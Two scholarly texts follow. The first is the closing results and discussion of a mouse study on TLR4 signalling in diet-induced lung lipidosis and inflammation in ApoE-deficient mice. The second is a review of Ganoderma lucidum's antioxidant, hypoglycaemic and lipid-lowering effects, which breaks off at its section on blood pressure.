Efficiency and safety of lentivirus transfection in vivo. GFP fluorescence in the lung was still observed at 12 weeks following transfection, which suggested a successful transfection of shRNA lentivirus (Fig. 7). To further confirm the efficacy of lentivirus-mediated TLR4 gene silencing, the levels of TLR4 mRNA and protein in the lung were determined. Compared with Figure 2. Double-label immunofluorescence of lung sections with macrophage CD68 (green) and TLR4 (red) markers. The nuclei were stained with DAPI (blue) (magnification, x200). Increased CD68 + TLR4 + cells in the ApoE -/mice fed on WD or ND for 12 weeks. The bars represent the mean ± standard error of seven mice. * P<0.05 compared to the same genotype mice fed on 12-week ND. # P<0.05 compared with the B6 mice fed on the same diet. B6, C57BL/6J; TLR4, toll-like receptor 4; ND, normal chow diet; WD, high-fat western-type diet; Apo, apolipoprotein.
ApoE -/-WD mice, TLR4 mRNA expression in the Lv-sh-TLR4 subgroup was reduced by 64.1% paralleled by a reduction of TLR4 protein by 49.3%. No adverse effects occurred during the trial, indicating that lentivirus transfection was safe (data not shown). Collectively, the results demonstrated an efficient and safe lentivirus-mediated transfection of shRNA in vivo.
Discussion
The present study reported that in genetically susceptible ApoE -/mice, a 12-week high-fat diet induced pulmonary lipidosis, as illustrated by an elevated lung cholesterol content and increased alveolar macrophage foam cell formation. It was discovered that, dependent on the time period of receiving the diet, the ApoE -/-WD mice exhibited inflammatory injury that was characterized by initial leukocyte recruitment (week 4), increased alveolar septal thickness, a mean linear intercept (week 12) and granuloma formation (week 24). The ApoE -/-ND mice or wild-type WD mice manifested a low-grade or no inflammation. The expression of TLR4 and its downstream molecules MyD88, p-NF-κB, TRIF and IRF3 were markedly upregulated in the 12-week-old ApoE -/-WD mice, whereas their expression was slightly changed in the ApoE -/-ND and wild-type WD mice. Blocking the TLR4 pathway was able to ameliorate lipidosis and inflammation in the ApoE -/-WD mice. To the best of our knowledge, the present study was the first to reveal that an ApoE deficiency combined with a high-fat diet caused lung lipidosis and inflammation via the TLR4 signaling pathway. Of note, it was found that the blocking of TLR4 could not fully ameliorate lipidosis and inflammation, suggesting that other signaling pathway(s) may be involved in those pathomorphological changes.
Inflammatory response in ApoE -/-WD mice. Evidence has indicated that the respiratory system and cardiovascular system are intricately intertwined (15). It has been well documented that the ApoE -/mice on a high-fat diet developed pulmonary arterial hypertension (16); those on a Paigen diet exhibited more severe pulmonary hypertension (17). An ApoE mimetic peptide was able to prevent airway inflammation and goblet cell hyperplasia in ApoE -/mice challenged by house dust mites (18). The present study indicated that ApoE -/-WD mice developed lung inflammation, which was characterized by initial inflammatory cell infiltration, resultant lipid phagocytosis and exudation, and ultimately, proliferation. The findings of the present study are partially substantiated by a study reporting that ApoE -/mice on a WD for 10 weeks developed inflammation and . Expression of TLR4 and its major downstream molecules in lung tissue as determined by western blotting following 12-week WD or ND. β-actin or NF-κB served as the loading control. The bars represent the mean ± standard error of four separate experiments. * P<0.05 compared with mice of the same genotype fed on the ND. # P<0.05 compared with the B6 mice fed on the same diet. TLR4, toll-like receptor 4; ND, normal chow diet; WD, high-fat Western-type diet; MyD88, myeloid differentiation protein 88; NF-κB, nuclear factor-kappa B; p-NF-κB, phosphorylated NF-κB; TRIF, TIR-domain-containing adapter-inducing interferon-β; IRF3, interferon regulatory factor 3; Apo, apolipoprotein. emphysema (3). However, the results of the present study contradicted those reported by Samokhin et al (4), who claimed that ApoE -/mice on a high-fat diet developed granulomas. These conflicting results may be partly explained by the difference in the lipid content in the diet and the duration of the high-fat diet. The wild-type mice on the WD exhibited hypercholesterolemia and hypertriglyceridemia with no evidence of lung inflammation and lipidosis. Gene-diet interaction effects were possibly involved in this outcome (19). In the wild-type mice, lipotoxicity induced by the WD resulted in microinflammation only. However, the ApoE-deficient mice treated with the same diet exhibited obvious inflammation injury, suggesting that lipotoxicity or ApoE deletion alone is not sufficient to induce inflammation injury.
Pulmonary lipidosis in the ApoE -/-WD mice. The primary function of ApoE is to facilitate lipid transport into cells by receptor-mediated endocytosis mediated by the low-density lipoprotein receptor. Adenosine triphosphatase-binding cassette transporter A1 (ABCA1) mediates the efflux of cholesterol to lipid-poor apolipoproteins (ApoA1 and ApoE) (20). It was reported that ABCA1 -/mice displayed lung cholesterol accumulation and inflammation (21). The results of the present study revealed that lung lipidosis occurred in the ApoE -/mice receiving the WD for 12 weeks. Lipid-laden macrophages were scarce in the ApoE -/-WD mice at 24 weeks, which indicated that the interaction between the genetic and nongenetic factors occurred only at the critical periods.
A B C D
TLR4 and activation of downstream molecules in ApoE -/-WD mice. TLR4 downstream signalling comprises at least two distinct pathways as follows: The MyD88-dependent activation of the NF-κB pathway that leads to the production of inflammatory cytokines and a MyD88-independent pathway associated with the production of interferon-beta and the maturation of dendritic cells. The results of the present study showed that TLR4 signalling activated the MyD88/NF-κB Figure 7. Efficiency of lentivirus transfection by monitoring GFP fluorescence, TLR4 mRNA and protein expression in the lung 12 weeks following lentivirus injection. Arrows indicate GFP + cells. Original magnification, x400. For TLR4 mRNA expression, the comparative threshold cycle method was used to analyze the gene expression normalized to GAPDH by polymerase chain reaction analysis. TLR4 protein expression was quantitated by western blotting. Bars represent the mean ± standard error from triplicate values. * P<0.05 vs. control. GFP, green fluorescence protein; sh-TLR4, short hairpin toll-like receptor 4-targeted gene silencing; Apo, apolipoprotein. Figure 6. Effects of TLR4 interference on (A) MyD88, p-NF-κB, (B) TRIF and IRF3 expression in the lung of mice following 12 weeks of a high-fat Western-type diet as determined by western blotting. β-actin or total NF-κB served as a loading control. Bars represent the mean ± standard error of three independent experiments with similar results. * P<0.05 compared to ApoE -/empty vector mice. # P<0.05 compared with wild-type mice. MyD88, myeloid differentiation protein 88; NF-κB, nuclear factor-kappa B; P-NF-κB, phosphorylated NF-κB; TRIF, TIR-domain-containing adapter-inducing interferon-β; IRF3, interferon regulatory factor 3; Apo, apolipoprotein.
A B
and the TRIF/IRF3 pathway to elicit lung inflammation and lipidosis in the ApoE -/-WD mice. It was indicated that MyD88 and p-NF-κB were elevated in the wild-type mice fed a WD, which was partially consistent with a study reporting that a high-fat diet led to the upregulation of TLR4 and NF-κB expression in the intestines of wild-type mice (23). The present study demonstrated that ApoE deficiency in combination with a WD induces lipidosis and chronic inflammation in lungs through the TLR4 pathway. There is evidence for the correlation between respiratory and cardiovascular diseases (24); however, the precise mechanisms underlying this co-morbidity have remained elusive, and research on the correlation of the two disorders is in its early stages. It is well-documented that TLR4 signalling has an important role in atherosclerosis (25). The findings of the present study illustrated that TLR4 signalling may be a possible common pathway that contributes to lung injury and atherosclerosis, which may provide valuable information for elucidating the lung-heart cross-talk. However, evidence provided in the present study is limited, and future studies on the gene silencing of MyD88 may be required to validate the involvement of TLR4 downstream signaling in the WD-induced lung pathology in the absence of ApoE more convincingly. Due to the complexity of the mechanism of the gene-environment interaction (26), the neuroendocrine system, the changes in the gene methylation pattern and the roles of other TLRs in the animal model used in the present study, further investigation is warranted. | 2016-05-14T03:07:38.459Z | 2015-05-12T00:00:00.000 | {
"year": 2015,
"sha1": "7bc7c4f1ff3bc64df9c2a6d5dca24c6beef96e73",
"oa_license": "CCBY",
"oa_url": "https://www.spandidos-publications.com/10.3892/mmr.2015.3774/download",
"oa_status": "HYBRID",
"pdf_src": "PubMedCentral",
"pdf_hash": "7bc7c4f1ff3bc64df9c2a6d5dca24c6beef96e73",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Biology",
"Medicine"
]
} |
237376490 | pes2o/s2orc | v3-fos-license | The beneficial effects of Ganoderma lucidum on cardiovascular and metabolic disease risk
Abstract Context Various herbal medicines are thought to be useful in the management of cardiometabolic disease and its risk factors. Ganoderma lucidum (Curtis) P. Karst. (Ganodermataceae), also known as Lingzhi, has received considerable attention for various indications, including some related to the prevention and treatment of cardiovascular and metabolic disease by ameliorating major cardiovascular risk factors. Objective This review focuses on the major studies of the whole plant, plant extract, and specific active compounds isolated from G. lucidum in relation to the main risk factors for cardiometabolic disease. Methods References from major databases including PubMed, Web of Science, and Google Scholar were compiled. The search terms used were Ganoderma lucidum, Lingzhi, Reishi, cardiovascular, hypoglycaemic, diabetes, dyslipidaemia, antihypertensive, and anti-inflammatory. Results A number of in vitro studies and in vivo animal models have found that G. lucidum possesses antioxidative, antihypertensive, hypoglycaemic, lipid-lowering, and anti-inflammatory properties, but the health benefits in clinical trials are inconsistent. Among these potential health benefits, the most compelling evidence thus far is its hypoglycaemic effects in patients with type 2 diabetes or hyperglycaemia. Conclusions The inconsistent evidence about the potential health benefits of G. lucidum is possibly because of the use of different Ganoderma formulations and different study populations. Further large controlled clinical studies are therefore needed to clarify the potential benefits of G. lucidum preparations standardised by known active components in the prevention and treatment of cardiometabolic disease.
Introduction
Cardiovascular disease (CVD) is highly prevalent, with ischaemic heart disease and stroke being the two leading causes of mortality throughout the world (World Health Organization 2021). Metabolic syndrome is characterised by a cluster of conditions including insulin resistance, central obesity, hypertension, dyslipidaemia, and low-grade chronic inflammation (Eckel et al. 2005). Several drug treatments for CVD have been derived from plant sources, such as digoxin and reserpine. Herbal medicines are now becoming more popular, representing a potentially costeffective class of substances for combating CVD if safe and effective therapies can be identified. The common herbal medicines used in the West include Asian ginseng, astragalus, flaxseed oil, garlic, ginkgo, grape seeds, green tea, hawthorn, milk thistle, and soy (Liperoti et al. 2017). Herbal formulae are widely used in the clinic in China for hypertension, dyslipidaemia, coronary heart disease, and heart failure (Liu and Huang 2016).
Ganoderma (Ganodermataceae) is a kind of woody mushroom that can be found all over the world. Individual members of the species are identified according to different characteristics, such as shape and colour (red, black, blue/green, white, yellow, and purple) of the fruiting bodies, host specificity, and geographical origin (Upton 2000;Wachtel-Galor et al. 2011). Ganoderma lucidum (Curtis) P. Karst. (Curtis 1781), known as Lingzhi in China and Reishi in Japan, has been used in traditional Chinese medicine (TCM) for over 2000 years for a broad range of indications including improving general health, wellbeing, and longevity (Bishop et al. 2015;Klupp et al. 2015).
A variety of commercial products from G. lucidum, such as powders, dietary supplements, and tea (Wachtel-Galor et al. 2011), are available. They have been shown to possess a range of activities against CVD, including effects on lipids, blood pressure, obesity, diabetes, and antioxidant and radical scavenging properties (Liu and Tie 2019;Meng and Yang 2019;Winska et al. 2019). However, scientific evidence supporting the beneficial medical properties of G. lucidum is still inconclusive (Hapuarachchi et al. 2016). Many of the commercial products from G. lucidum may not have undergone effective standardisation, so it is difficult to compare results from different studies with different products. Many different herbal supplements or nutraceutical commercial products bearing the names Lingzhi, Reishi, or Ganoderma, etc., contain extracts from various parts of G. lucidum, often in combination with other herbal components. Ganopoly TM (Encore Health), which is a product containing water-soluble G. lucidum polysaccharides, has been used in some animal and clinical studies.
Methods
In this review, the major studies of the whole plant, plant extract, and specific active compounds isolated from G. lucidum in relation to the main risk factors for CVD with particular emphasis on the more recent studies, are summarised. Electronic literature searches were performed using PubMed, Web of Science, and Google Scholar (published from 1961 to 2021). The search terms used were Ganoderma lucidum, Lingzhi, Reishi, cardiovascular, hypoglycaemic, diabetes, dyslipidaemia, antihypertensive, and anti-inflammatory. A total of 4224 articles were identified. The bibliographies of all relevant articles thus located were also scanned for further relevant references. S.W.C and B.T. extracted all articles independently based on the relevance, quality, and strength of the studies; only a shortlist of 115 studies or representative findings are discussed below.
Active constituents of G. lucidum G. lucidum is thought to have numerous different biologically active constituents, the main ones being various triterpenes, polysaccharides, and proteins (Ahmad 2018;Ahmad et al. 2013). The pharmacologically active compounds are present in different amounts in various parts of the mushroom such as the fruiting bodies, mycelium and spores.
Triterpenes
Terpenes are a large and diverse group of naturally occurring compounds derived from the branched C5 carbon skeleton of isoprene. Triterpenes are a subclass of terpenes and are derived from squalene, a C30 hydrocarbon (Abdullah et al. 2012). They can be classified based on the number of cyclic structures making up the compounds. Up to now, more than 150 triterpenes have been identified from the spores, fruiting bodies, and mycelia of G. lucidum (Xia et al. 2014;Baby et al. 2015). The methods of extraction of triterpenes usually involve methanol, ethanol, chloroform, ether, acetone, or a mixture of these solvents. The extracts can be further purified by various separation methods such as normal and reverse-phase high-performance liquid chromatography (HPLC) (Chen et al. 1999). The majority of triterpenes identified are ganoderic acids and lucidenic acids; other important triterpenes include ganodermic acids, ganoderals, and ganoderiols (Wachtel-Galor et al. 2011). The strong bitterness of G. lucidum originates from the triterpenoid compounds and the bitterness depends on the strain, cultivation conditions and manufacturing processes (Seo et al. 2009). Triterpenoids have been reported to exhibit various biological activities including antihypertensive, lipid-lowering, anti-acetylcholinesterase, antioxidant, and anticancer activities, etc. (Abdullah et al. 2012;Chen et al. 2017).
Polysaccharides and peptidoglycans G. lucidum polysaccharides are macromolecules with a molecular mass of above 500 kDa. Many different polysaccharides, including (1!3), (1!6)-a/b-glucans, a-D-glucans, a-D-mannans, and polysaccharide-protein complexes, have been identified from the spores, fruiting bodies and mycelia of G. lucidum. These compounds are reported to have immunomodulatory and anticancer activities (Xu et al. 2011;Kao et al. 2013). Glucose, together with xylose, mannose, galactose, and fucose in different conformations, forms the major component of the polysaccharide molecules. Polysaccharides are the major component by weight among all constituents in the spores. Several of the mushroom polysaccharide compounds have proceeded through Phase I, II, and III clinical trials and have been used in some Asian countries to treat various cancers and other diseases (Wasser 2010). The contents of polysaccharides differ among commercial Lingzhi products (Wachtel-Galor et al. 2011). A polysaccharidebased product extracted from the spores of G. lucidum originally named 'Ji 731 Injection' was used since 1973 in China for treating myopathy (Zeng et al. 2018). The drug was renamed 'Ji Sheng Injection' in 1985 and subsequently 'Polysaccharidum of G. lucidum Karst Injection' (Lin Bao Duo Tang Zhu She Ye) and is still used for intramuscular injection for various types of immune-mediated muscle diseases. Various bioactive peptidoglycans possessing antiviral (Li et al. 2005) and immunomodulating activities (Zhang et al. 2019), such as ganoderans A, B, and C, have also been isolated from G. lucidum.
Bioactive proteins
Several bioactive proteins from G. lucidum have been reported. One of these is a polypeptide called Lingzhi-8 (LZ-8) which consists of 110 amino acids with a molecular mass of 12 kDa. It has an immunoglobulin-like structure and was the first immunomodulatory protein isolated from the mushroom in 1989 (Hsu and Cheng 2018). Another protein from the fruiting bodies of G. lucidum is ganodermin, which has a molecular mass of 15 kDa and has antifungal activity.
Health benefits of G. lucidum
Antioxidant effects
Free radicals are unstable and highly reactive chemical entities which contain one or more unpaired electrons and can be uncharged or charged. Free radicals are beneficial to the cell signalling and immune system, as well as maintenance of normal body functioning. However, excessive formation and/or insufficient removal of reactive oxygen species (ROS) and reactive nitrogen species (RNS), known as 'oxidative stress', may modulate the blood vessel wall, creating an environment that facilitates the progression of atherosclerosis, and leading to various illnesses, such as heart disease, diabetes and cancer (Johansen et al. 2005;Ullah et al. 2016).
In vitro studies demonstrated that several constituents of G. lucidum, in particular triterpenoids and polysaccharides, exhibit antioxidant activity, reducing power, scavenging and chelating abilities (Mau et al. 2002;Saltarelli et al. 2009;Wu and Wang 2009;Liu et al. 2010;Sarmadi and Ismail 2010;Kozarski et al. 2011;Ferreira et al. 2015;Krishna et al. 2016). In contrast, polysaccharide extracts of G. lucidum have superoxide and hydroxyl radical scavenging activities but do not have antioxidative activity as measured by detecting malondialdehyde (MDA) contents of liver microsomes (Liu et al. 1997). It has been demonstrated that the phenolic compounds from the fresh fruiting bodies of G. lucidum exhibit strong 1,1-diphenyl-2-picrylhydrazyl (DPPH) radical scavenging activity but low superoxide dismutase (SOD) activity. The study also showed that DPPH radical scavenging activity and SOD activity were positively correlated with phenolic compounds including caffeic acid, catechin, ferulic acid, gallic acid, myricetin, naringin, pyrogallol, protocatechuic acid, homogentisic acid, and quercetin, as well as total phenolic compounds (Kim et al. 2008). A study comparing the antioxidant activities of four of the most widely known mushrooms, including G. lucidum, demonstrated that polysaccharide extracts exhibited a strong correlation between the reducing power and the total amount of phenols and a-glucans, while a correlation between the reducing power and the amount of total polysaccharides and proteins was not found (Kozarski et al. 2012).
In vivo studies have shown that G. lucidum increases the activity of the antioxidant enzymes SOD and catalase (CAT), which are involved in removing harmful ROS (Cherian et al. 2009;Yurkiv et al. 2015;Vitak et al. 2017;Rahman et al. 2018). In an ischaemia and reperfusion isolated perfused rat heart model, administration of G. lucidum extract (400 mg/kg for 15 days) exhibited antioxidant properties and the author concluded that the cardioprotective properties of G. lucidum extract are related to its antioxidant effects (Lasukova et al. 2015). A study in rats showed that G. lucidum ethanol extract (250 mg/kg body weight) ameliorated the cardiotoxicity of adriamycin by reducing the increase in lipid peroxidation and reversing the decrease in the antioxidant enzymes, glutathione peroxidase (GPx), glutathione-S-transferase (GST), SOD and CAT in the heart tissue (Rajasekaran and Kalaimagal 2012). The cardioprotective effect of G. lucidum may be attributed to the antioxidant chemicals triterpenes and polysaccharides (Wachtel-Galor et al. 2004b). In a carotid-artery-ligation mouse model, daily oral G. lucidum (300 mg/kg/day) prevented neointimal thickening 2 weeks after ligation. Furthermore, subcutaneous injections of ganoderma triterpenoid (GT) crude extract (300 mg/kg/day) abolished ligation-induced neointima formation. The authors concluded that GTs prevent atherogenesis by eliminating disturbed flow-induced oxidative stress through inhibiting the induction of a series of atherogenic factors, as well as inflammation .
A short-term supplementation study over 10 days in healthy subjects showed an improvement in antioxidant status (Wachtel-Galor et al. 2004a), but a longer double-blind, placebo-controlled, cross-over intervention study over 4 weeks with a commercially available encapsulated Lingzhi preparation (1.44 g Lingzhi/day; equivalent to 13.2 g fresh mushroom/day) showed no significant effects in a range of biomarkers for antioxidant status, cardiovascular risk, DNA damage, immune status, and inflammation (Wachtel-Galor et al. 2004b). A placebo-controlled cross-over study in 42 healthy subjects examined the antioxidation and hepatoprotective efficacy of triterpenoids and polysaccharide-enriched G. lucidum, which was taken as a 225 mg capsule containing 7% triterpenoid-ganoderic acid (A, B, C, C5, C6, D, E and G), 6% polysaccharide peptides with a few essential amino acids and trace elements, once daily for 6 consecutive months (Chiu et al. 2017). The treatment showed an improvement in total antioxidant capacity, total thiols and glutathione content in plasma, significantly enhanced activities of antioxidant enzymes (SOD, CAT, GPx and glucose-6-phosphate dehydrogenase), and reduced the levels of thiobarbituric acid reactive substances, 8-hydroxy-deoxy-guanosine and hepatic marker enzymes, glutamic-oxaloacetic transaminase and glutamic-pyruvic transaminase. Mild fatty liver detected by abdominal ultrasonic examination was reversed to normal with G. lucidum treatment.
Hypoglycaemic activity
Hyperglycaemia may increase the susceptibility to lipid peroxidation and modulate glucose metabolism in the body, which ultimately contributes to the increased incidence of atherosclerosis or further accelerates its progression (Giugliano et al. 1996;Poznyak et al. 2020). Insulin treatment is essential for people with type 1 diabetes. In type 2 diabetes mellitus (T2DM), lifestyle modification is recommended. If lifestyle modification is not sufficient in achieving glycemic control, patients should be treated initially with metformin (American Diabetes Association 2020). Metformin belongs to the biguanide class of drugs, which originate from the plant goat's rue or French lilac (Galega officinalis, Linnaeus, [Fabaceae]) (Witters 2001). Recently, the glucagon-like peptide 1 (GLP-1) receptor agonists and sodium-glucose cotransporter 2 (SGLT2) inhibitors, which were developed from phlorizin, a natural compound isolated from the bark of apple roots (Tomlinson et al. 2017), have been considered suitable for first-line treatment in some patients with T2DM who have concomitant cardiac or renal disease, in order to improve cardiovascular outcome benefits (Davies et al. 2018). The hypoglycaemic effects of various extracts from G. lucidum have been studied in different animal models of diabetes and in in vitro experiments to identify mechanisms (Ma et al. 2015;Wang et al. 2016;Winska et al. 2019). The main in vitro, animal and clinical studies investigating the hypoglycaemic effects of G. lucidum are summarised in Tables 1-3, respectively.
Hypoglycaemic activity of triterpenoids A series of in vitro studies by Fatmawati and colleagues have identified that methanol extract from the fruiting bodies of G. lucidum has a strong inhibitory effect on human aldose reductase activity. Ganoderic acid Df (Figure 1), a lanostane-type triterpenoid, exhibited potent aldose reductase inhibitory activity with an IC 50 value of 22.8 mM (Fatmawati et al. 2009(Fatmawati et al. , 2010. Fatmawati et al. (2011a) subsequently demonstrated that ganoderol B (Figure 2), which was isolated from a chloroform extract of G. lucidum, was effective in inhibiting a-glucosidase activity with an IC 50 value of 119.8 mM and the inhibitory effect was stronger than that of acarbose, which is commonly used as a medication to inhibit a-glucosidase in patients with T2DM. Structure-activity studies were performed to identify the structural requirements of lanostane-type triterpenoids from G. lucidum, which were necessary to increase a-glucosidase inhibitory activity (Fatmawati et al. 2013).
Hypoglycaemic activity of proteoglycans/peptidoglycans Inhibition of PTP1B activity has been regarded as a potential therapy for T2DM for many years (Johnson et al. 2002). Fudan-Yueyang-G. lucidum (FYGL), which is a water soluble macromolecular proteoglycan extracted from the fruiting bodies of G. lucidum, inhibits PTP1B activity with an IC 50 value of Table 2. Animal studies on the hypoglycaemic effects of G. lucidum.
References
Animal model Interventions Findings Hikino et al. 1985 Normal and alloxan-induced hyperglycaemic mice Water extracts (10 4 mg/kg crude drug equivalent, i.p.) of the fruiting bodies of G. lucidum for 7 or 27 h Reduced plasma glucose and 2 glycans, ganoderans A and B, with hypoglycaemic action isolated Hikino et al. 1989 Normal and glucose-loaded mice Ganoderan B Increased insulin and altered enzyme activities Kino et al. 1990 Autoimmune diabetes model in nonobese mice Ling Zhi-8 immunomodulatory protein (10.3 À 12.6 mg/kg twice weekly) from 4 weeks of age, followed up to 42 weeks of age Prevented development of autoimmune diabetes by immunosuppressive mechanism Zhang et al. 2003 Alloxan-induced diabetic mice Pre-treatment with intragastric Gl-PS (50 À 200 mg/kg) for 10 days Gl-PS partly protected beta cells from necrosis Zhang & Lin 2004 Normal fasted mice Gl-PS (25 À 100 mg/kg) given by single intraperitoneal injections Reduced serum glucose and increased insulin levels He et al. 2006 Streptozotocin-induced diabetic mice Gl-PS (125 and 250 mg/kg) given for 8 weeks Reduced serum glucose, increased insulin levels and delayed progression of diabetic renal disease Seto et al. 2009 Genetically obese/diabetic (þdb/þdb) and lean (þdb/þm) mice 5.12 ± 0.05 mg/mL (Teng et al. 2011). FYGL enhances glycogen synthesis and inhibits the expression of glycogen synthase kinase-3b (GSK3b) in liver tissues of ob/ob mice and HepG2 cells probably via modulating insulin receptor substrate 1 (IRS1)/ phosphatidylinositol-3 kinase (PI3K)/protein kinase B (Akt)/ AMP-activated protein kinase (AMPK)/GSK3b cascades (Yang et al. 2018a). In rat myoblast PTP1B-transfected L6 cells, FYGL improves insulin resistance by regulating IRS1-glucose transporter type 4 (GLUT4) cascades in the insulin signalling pathway (Yang et al. 2018b). In streptozotocin-induced T2DM mice, FYGL reduces plasma glucose levels with an effect comparable with metformin and rosiglitazone, via inhibiting the PTP1B expression and activity, and consequently modulating the tyrosine phosphorylation level of the insulin receptor (IR) 13-subunit (Teng et al. 2011(Teng et al. , 2012. In addition, FYGL improves the plasma biochemistry indexes associated with T2DM-accompanied metabolic disorders, including free fatty acids, triglycerides (TG), total cholesterol (TC), low-density lipoprotein cholesterol (LDL-C), and high-density lipoprotein cholesterol (HDL-C) (Teng et al. 2012). Further mechanistic studies in db/db mice found that the hypoglycaemic effect of FYGL is associated with its ability to enhance insulin secretion, decrease hepatic glucose output, and increase adipose and skeletal muscle glucose disposal (Pan et al. 2013(Pan et al. , 2014. In normal and alloxan-induced hyperglycaemic mice, water extraction yielded from the fruiting bodies of G. lucidum and the two peptidoglycans, ganoderans A and B, subsequently produced through fractionation have all shown hypoglycaemic activity (Hikino et al. 1985). Administration of ganoderan B increases plasma insulin levels in normal and glucose-loaded mice; it also increases the activities of hepatic glucokinase, phosphofructokinase and glucose-6-phosphate dehydrogenase, decreases hepatic glucose-6-phosphatase (G6Pase) and glycogen synthetase activities and does not affect the activities of hexokinase and glycogen phosphorylase (GP) (Hikino et al. 1989).
Hypoglycaemic activity of Ganoderma polysaccharides Hypoglycaemic effects of polysaccharides from G. lucidum (Gl-PS) have been demonstrated in several in vitro and in vivo studies. Gl-PS showed a protective effect against alloxan-induced damage to pancreatic islets in vitro. Pre-treatment with intragastric Gl-PS (50-200 mg/kg) for 10 days produced hypoglycaemic effects via its scavenging ability to protect the pancreatic b-cells from alloxan-induced necrosis (Zhang et al. 2003). Gl-PS (25-100 mg/kg) given by single intraperitoneal injections to normal fasted mice reduced serum glucose levels after 3 and 6 h in a dose-dependent manner and increased insulin levels from 1 h after administration via enhancing Ca 2þ influx into pancreatic b cells (Zhang and Lin 2004). Furthermore, administration of Gl-PS produced hypoglycaemic effects and an improvement in lipid profile in streptozotocin-induced diabetic mice (He et al. 2006;Li et al. 2011;Zheng et al. 2012). It has been suggested that the hypoglycaemic effect is mainly through preventing apoptosis of pancreatic b-cells and enhancing b-cells regeneration (Zheng et al. 2012), and a modulation of serum insulin and hepatic mRNA levels of several key enzymes involved in gluconeogenesis and/or glycogenolysis, including GP, fructose-1,6-bisphosphatase (FBPase), phosphoenolpyruvate carboxykinase (PEPCK), and G6Pase (Xiao et al. 2012). Xiao et al. (2017) isolated F31, a b-heteropolysaccharide with a weight-average molecular weight of 15.9 kDa, from Gl-PS. The mechanism of action of Gl-PS F31 may be associated with down-regulation of the hepatic glucose regulated enzyme mRNA levels via AMPK activation, improvement of insulin resistance, and reduction of epididymal fat/body weight ratio (Xiao et al. 2017). An integrative analysis of transcriptomics and proteomics data from the liver from F31-treated diabetic db/db mice found that genes in the glycolysis and gluconeogenesis pathways, insulin pathway, and lipid metabolism pathways showed significantly different expression compared to the untreated mice and that microRNAs probably participated in the regulation of the genes involved in glucose metabolism (Xiao et al. 2018).
Hypoglycaemic activity of Ganoderma extracts Some other studies used extracts of G. lucidum in which the active constituents were not clearly identified. A water-extract of G. lucidum given to lean (þdb/þm) and genetically obese/diabetic (þdb/þdb) mice lowered the serum glucose level in þ db/ þdb mice after one week of treatment and in þ db/þm mice after 4 weeks, through the down-regulation of the hepatic PEPCK gene expression (Seto et al. 2009). A study in alloxanand steroid-induced diabetic rats showed that a petroleum ether extract and a methanol extract of G. lucidum given orally at 200, 400, 600 and 800 mg/kg/day for 7 days reduced plasma glucose levels, increased insulin sensitivity, and decreased lipid levels, and the suspected bioactive chemicals were polysaccharides available in the extracts (Sarker 2015). A hypoglycaemic effect was also observed following administration of an alcoholic extract of G. lucidum (250, 500, and 1000 mg/kg) given for 14 days in alloxan-induced diabetic rats (Ratnaningtyas et al. 2018). Another recent study in streptozotocin-induced diabetic rats showed that a hydroethanolic extract of G. lucidum containing b-glucan, proteins, and phenols, reduced plasma glucose and lipid levels through preservation of pancreatic islets (Bach et al. 2018).
Hypoglycaemic activity of Ganoderma proteins Ling Zhi-8 (LZ-8), an immunomodulatory protein isolated from the mycelial extract of G. lucidum, prevented the development of autoimmune diabetes by reducing antigen-induced antibody formation in non-obese diabetic mice (Kino et al. 1990). In a model of transplanted allogeneic pancreatic rat islets, LZ-8 delayed the rejection process of allografted islets (van der Hem et al. 1995).
Evidence from clinical studies
Clinical studies of the hypoglycaemic/antidiabetic effects of G. lucidum products are very limited. In a placebo-controlled study in 62 patients with T2DM, administration of Ganopoly TM at 1800 mg three times daily for 12 weeks reduced fasting and postprandial plasma glucose levels, as well as HbA1c (Gao et al. 2004b). Administration of a dry extract of G. lucidum (3 g) in addition to regular oral hypoglycaemic agents for 12 weeks did not affect fasting glucose or HbA1c; however, the plasma glucose area under the curve during a meal tolerance test was reduced more significantly in patients taking G. lucidum (Wang et al. 2008). A randomised, double-blind, placebo-controlled, crossover study with placebo-controlled run-in and cross-over periods of a Lingzhi product at a dose of 1.44 g daily for 12 weeks was performed in subjects with borderline elevations of blood pressure and/or cholesterol. There were reductions in plasma insulin and homeostasis model assessment-insulin resistance with Lingzhi compared to placebo. The subjects in this study had normal plasma glucose levels and it was speculated that the effects on insulin and insulin resistance would be greater in subjects with impaired glucose tolerance or T2DM (Chu et al. 2012). However, in a more recent study in 84 patients with T2DM and metabolic syndrome, administration of G. lucidum alone or combined with Cordyceps sinensis [now called Ophiocordyceps sinensis (Berk.) Sacc. (Ophiocordycipitaceae)], over 16 weeks, did not show any improvement in hyperglycaemia and cardiovascular risk factors (Klupp et al. 2016). It is noteworthy that different extracts of G. lucidum will have different components, therefore it may not be appropriate to compare the results from different studies.
Effects on dyslipidaemia
Dyslipidaemia which is characterised by decreased levels of HDL-C and accompanied with increased levels of TG, apo B, and small dense LDL particles, is an important modifiable risk factor for the development of atherosclerosis and CVD. Guidelines for the treatment of lipid disorders recommend initiating treatment with the 3-hydroxy-3-methylglutaryl-coenzyme A (HMG-CoA) reductase inhibitors or statins (Grundy et al. 2019;Mach et al. 2020). Statins have their origin in products isolated from fungi (Endo 2004).
In vitro studies showed that polysaccharides and oxygenated triterpenoids from G. lucidum have a very broad spectrum of biological activities and pharmacological effects. Some types of ganoderic acid might reduce cholesterol by inhibiting HMG-CoA reductase, like the statin drugs (Shiao 2003). Compounds isolated from fruiting bodies of G. lucidum including ganolucidic acid eta, ganoderenic acid K, and the farnesyl hydroquinones (ganomycin J and ganomycin B), showed strong inhibitory activity against HMG-CoA reductase (Figure 3) (Chen et al. 2017).
The cholesterol-lowering properties of G. lucidum have been demonstrated in a series of in vitro and ex vivo studies, and in hamsters and minipigs (Berger et al. 2004). The organic fractions containing oxygenated lanosterol derivatives inhibited cholesterol synthesis in T9A4 hepatocytes. The investigators found that both 2.5 and 5% dried G. lucidum reduced hepatic microsomal ex-vivo HMG-CoA reductase activity. In hamsters, administration of 5.0% dried G. lucidum decreased TC and HDL-C but not LDL-C, whereas in minipigs, 2.5% dried G. lucidum reduced all these parameters.
The improvements in the lipid profile in some diabetic animal models and in patients with T2DM treated with G. lucidum products may be related to the improvement in glycemic control, rather than a direct effect on lipid metabolism as hyperglycaemia is often associated with elevated TG and reduced HDL-C (Taskinen and Bor en 2015). In a randomised, double-blind, cross-over study in 26 patients with borderline elevations of blood pressure and/or cholesterol, administration of Lingzhi (1.44 g extract/d) for 12 weeks produced a non-significant trend for reduction in TG and increase in HDL-C (Chu et al. 2012). Those changes could have been related to improvements in insulin resistance as these lipid abnormalities, hypertension, central obesity and insulin resistance cluster together in the metabolic syndrome.
Antihypertensive effects
